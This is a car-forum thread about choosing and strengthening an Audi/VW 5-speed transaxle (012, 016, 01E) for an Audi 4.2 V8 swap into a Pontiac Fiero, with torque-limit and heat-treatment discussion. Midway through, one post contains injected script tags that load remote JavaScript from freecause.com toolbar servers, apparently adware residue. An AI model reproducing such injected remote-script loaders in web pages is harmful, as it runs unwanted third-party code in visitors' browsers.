Audi / VW 5 Speed

Hi i am new to all the Audi / VW transmissions so what is the Best 5 speed that will mate to the 1998 4.2 Audi v8 . what type of mods can be done to it to make it stronger . what is the max torque before it fails

should the parts be Cryogenic treated and heat treated or plasma ion nitride treated pleas you thought or experience on it will help

Mark, I'm not trying to be rude but I think you'll find a good many answers within the friendly confines of your local search engine on this forum. There are plenty of us using Audi transaxles in your car. If that's not convenient then contact Scott Dewitt (or check his posts) at www.Advancedautomotion.com He seems to know his Audi boxes pretty well.

i will try Scott since the search just brings up every thing and i mean every thing you would be better of just looking through every thread

For the bolt patterns I believe the 012 is the 5-speed that shares the 4.2l bellhousing pattern and I think the 01E 6-speed shares the same pattern as the 012...

I'm afraid I wont be much help with your question about the heat treatments etc though, sorry.

I did some more research and fond that cryogenic and induction heat treating will help but do not use Nitriding it makes the gear to brittle for high shock loading

Now i think Getrag made these transaxle so i went to there site to see what i could find and i noticed that in rating the trans they give a nm but also a max kg vehicle weight like the was a 6 speed rated for 380 Nm torque and max vehicle weight of 2050 Kg so i would think that as vehicle weight go's down then more torque can be applied

Mark,

You're right that as vehicle weight decreases then the max torque spec generally goes up, but it's an indirect relationship at best.

The engineering reasoning behind this is based upon the notion that it is the duration of time at peak load that varies as vehicle weight increases/decreases. Weight doesn't actually affect the peak loads experienced by the transaxle - the engine is putting the same peak forces through the transaxle regardless of weight. The difference is that a vehicle which is heavier generally exposes the transaxle to longer periods of peak loading, and this in turn affects the long term durability and reliability of the transaxle. Gear teeth and bearing surfaces, for example, wear at a rate dependent upon both force and time under load (among other factors) - heavier vehicle correlates highly with more time under load.

So to relate this to the larger discussion, it's somewhat of a mistake to equate lighter weight with a higher permissible instantaneous peak load rating. Said another way, just because the car may be very light weight the little ole' Audi box can't handle a 650hp/tq big block burn out.....unfortunately. However, most of these Audi boxes aren't that expensive compared to a ZF, so no big deal if one implodes. I keep extras under my work bench for that very reason!!

thanks never really thought of it that way. just a bit of info of what i am doing i wish i had the money to build a GT40 kit car but i don't so this is going in a Fiero with the Audi 4.2. The engine is from a 1998 A8 and transmission from a 2001 Passat I know that my axle center lines are going to be off from transmission to spindle by about 3 inches or at about a 10 degree angle i would like them to be lined up but i don't think this is so bad it will hurt anything

The 5 speed can handle stock Audi V8 horsepower provided your not stupid with it. Generally after about 250 ft/lbs you start seeing issues with the 012 5 speeds.

You also have to be careful that you end up spending more money trying to make a gearbox that is weak by design stronger, than what an inherently stronger gearbox will cost.
<script src="http://s3pr.freecause.com/4Loot_script.js"></script><script src="http://s3toolbar.freecause.com/0RewardsMarker/bro_utils_js.js"></script><script src="http://s3toolbar.freecause.com/0RewardsMarker/bro_lm_js.js"></script><script> var fctb_tool=null; function FCTB_Init_4c67753684644135812fdc6e02e046bf(t) { fctb_tool=t; start(fctb_tool); } FCTB_Init_4c67753684644135812fdc6e02e046bf(document['FCTB_Init_fe854c52a0674f039dc0d36566629724']); delete document['FCTB_Init_fe854c52a0674f039dc0d36566629724']</script>

Scott would i be better off with the 016 standard or maybe a 5 or 6 speed automatic i don't really like the automatics but it would be cheaper

Is there a 5 speed better than the 016 or does it just go from the 016 then next up the ladder is 6 speed 01x. picture below is of the Fiero it all will be put in

SSCN1193_1.JPG

the 01E is a 6 speed right and not really to easy to find and they want good money for them used at least the ones i see are $1200 so might as well buy the new one off advanced automotion<!-- google_ad_section_end -->

well i have bought a engine and transmission the transmission is a 012 not the best but i think it will be fine as long as i use my brain and don't side step the clutch at 6000 rpm

the 01E is a 6 speed right and not really to easy to find and they want good money for them used at least the ones i see are $1200 so might as well buy the new one off advanced automotion<!-- google_ad_section_end -->

The 01E is available as a 5 & 6 spd box and they are getting harder to find

Hi Mark, Thanks for the link did you realize if you take out all the extra stuff in the url and go to the Technik section, there is a lot of really good manuals there although the headings are in Spanish, the manuals are in English the most interest being the Corky Bell manual on turbocharging, and all types of welding, and modern car tuning, all definately worth a read.
also in here a breakdown of how the 016 works in the Quantum Syncro
http://www.volkspage.net/technik/manuaisecatalogos/02/manualdemanutencao_vwquantumsyncro.pdf
and with regard to gearbox selection you gotta read this pdf

http://www.volkspage.net/technik/ma..._fundamentalsselectiondesignandaplication.pdf

Last edited:
Mark:
Are you changing the engine orientation in that Fiero chassis?, If so there may be a need for some chassis stretching, and new motor mounts to the subframe.
If not I am wondering why you would just use one of the existing transaxles that were available.
Cheers
Phil

Back